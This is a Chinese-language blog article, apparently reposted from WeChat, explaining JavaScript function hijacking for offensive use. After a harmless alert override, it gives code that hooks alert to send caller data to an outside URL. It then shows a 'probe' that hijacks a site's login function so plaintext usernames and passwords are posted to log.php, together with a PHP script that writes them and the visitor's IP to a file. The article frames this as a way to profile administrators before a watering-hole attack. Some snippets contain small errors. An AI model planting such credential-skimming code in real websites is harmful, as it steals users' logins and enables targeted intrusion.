JavaScript 函数劫持攻击原理

时间:2022-08-25 11:35:31

JavaScript 函数劫持并不是什么新颖的技术了。这两天在和同事吹牛的过程中提到了这个,就简单地再回顾回顾,以及假想在攻防的运用场景。

JavaScript 函数劫持攻击原理

JavaScript 函数劫持(javascript hijacking)简介

 

一个简单的示例如下,主要逻辑就是,用变量 _alert保存原函数 alert,然后重写 alert 函数,在重写的函数最后调用原函数。这样得到的一个效果就是调用 alert 的时候,可以往 alert 中加入其它操作。比如如下代码中进行一个赋值。

  1. <script type="text/javascript"> 
  2.   var _alert = alert; 
  3.   alert = function(){ 
  4.     var str = "啥也不是"
  5.     _alert(str); 
  6.   } 
  7.   alert(); 
  8. </script> 

日志记录

 

这种编程技巧常用于开发中的日志收集与格式化。既然可以劫持函数加入自己的操作,那么就可以在比较隐蔽的执行一些猥琐的操作。比如:

https://wiki.jikexueyuan.com/project/brief-talk-js/function-hijacking.html

一文中提到的通过 Hook alert 函数来记录调用情况,或者弹一些警告信息,这样就可以记录到测试者的网络出口ip、浏览器指纹等信息也加上,没准就是日后的呈堂证供。

  1. <script type="text/javascript">   
  2.   function log(s) {   
  3.   var img = new Image();   
  4.   imgimg.style.width = img.style.height = 0;   
  5.   img.src = "http://yousite.com/log.php?caller=" + encodeURIComponent(s);   
  6.   }   
  7.   var _alert = alert;   
  8.   window.alert = function(s) {   
  9.   log(alert.caller);   
  10.   _alert(s);   
  11.   }   
  12. </script>   

探针

 

在某些场景下,比如:已有权限,但是数据库中密码是加密的,无法解开。又或者需要探测目标人员访问此网站的规律。此时就可以利用劫持登录函数来记录明文的账号密码。如下示例:

onclick 事件会调用 login 函数发送请求包:

  1.     <form id="form1"> 
  2.             <input type="text" id="username" name="username"/><br> 
  3.             <input type="password" id = "password" name="password"/><br> 
  4.             <button id="submit" onclick="login()">submit</button><br> 
  5.         </form> 
  6.         <script> 
  7.             function login(){ 
  8.                 var username = document.getElementById("username").value; 
  9.                 var password = document.getElementById("password").value; 
  10.                 $.ajax({ 
  11.                     url:"login.php", 
  12.                     type:"POST", 
  13.                     data:{ 
  14.                         "username":username, 
  15.                         "password":password 
  16.                     }, 
  17.                     success:function(){ 
  18.                         alert(1); 
  19.                     }, 
  20.                     error:function(){ 
  21.                         alert("error"); 
  22.                     } 
  23.                 }); 
  24.                  
  25.             } 
  26. </script> 

可以劫持 login 函数,在发送登陆请求前,先发到探针文件中做一些记录帐号密码等操作。

  1. var _login=login; 
  2. login = function (){ 
  3.     var username = document.getElementById("username").value; 
  4.     var password = document.getElementById("password").value; 
  5.     $.ajax({ 
  6.         url:"log.php", 
  7.         type:"POST", 
  8.         data:{ 
  9.             "username":username, 
  10.             "password":password 
  11.         }, 
  12.         success:console.log("1"), 
  13.         error:function(){ 
  14.             alert("error"); 
  15.         } 
  16.     }); 
  17.      

log.php 的内容如下:

  1. <?php 
  2. $username = $_POST["username"]; 
  3. $password = $_POST["password"]; 
  4. $ip = $_SERVER['REMOTE_ADDR']; 
  5. file_put_contents("./log.txt",$username." ".$password." ".$ip); 

 

也许在实际中更常见的表单形式应该是下面这种。

 

  1. <form id="form1" method="POST" action=“login.php”> 
  2.   <input type="text" id="username" name="username"/><br> 
  3.   <input type="password" id = "password" name="password"/><br> 
  4.   <input type="submit" id="submit" name="submit"/><br> 
  5. </form> 

这种表单也可以通过小小的改动,很简单的记录到信息,下面使用的是 onsubmit 事件,用如下方式即可:

  1. <script src="http://lib.sinaapp.com/js/jquery/1.7.2/jquery.min.js"> </script> 
  2.     <body> 
  3.         <form id="form1" method="POST" action=“login.php” onsubmit="return _login()"> 
  4.             <input type="text" id="username" name="username"/><br> 
  5.             <input type="password" id = "password" name="password"/><br> 
  6.             <input type="submit" id="submit" name="submit"/><br> 
  7.         </form> 
  8.          
  9.             <script> 
  10.                 function _login(){ 
  11.                     var username = document.getElementById("username").value; 
  12.                     var password = document.getElementById("password").value; 
  13.                     $.ajax({ 
  14.                         url:"log.php", 
  15.                         type:"POST", 
  16.                         data:{ 
  17.                             "username":username, 
  18.                             "password":password 
  19.                         }, 
  20.                         success:true, 
  21.                         error:true 
  22.                     }); 
  23.                 } 
  24. </script> 

不仅可以记录密码,还可以结合前面提到的记录日志,来记录管理员的登录时间、IP、UA 和浏览器指纹等信息。这种探针常用于布置水坑攻击前针对人员登录情况的信息收集,根据收集的信息制定具体的水坑方案。

原文地址:https://mp.weixin.qq.com/s?__biz=MzI5MDQ2NjExOQ==&mid=2247495002&idx=1&sn=e538e6240ac7ba0ff60c78c22873de22&chksm=ec1ddd72db6a5464d9be9595d61d21ac74f76bf7818f2c5cd2426d3d3389db7ca5e62dd72d8b&mpshare=1&s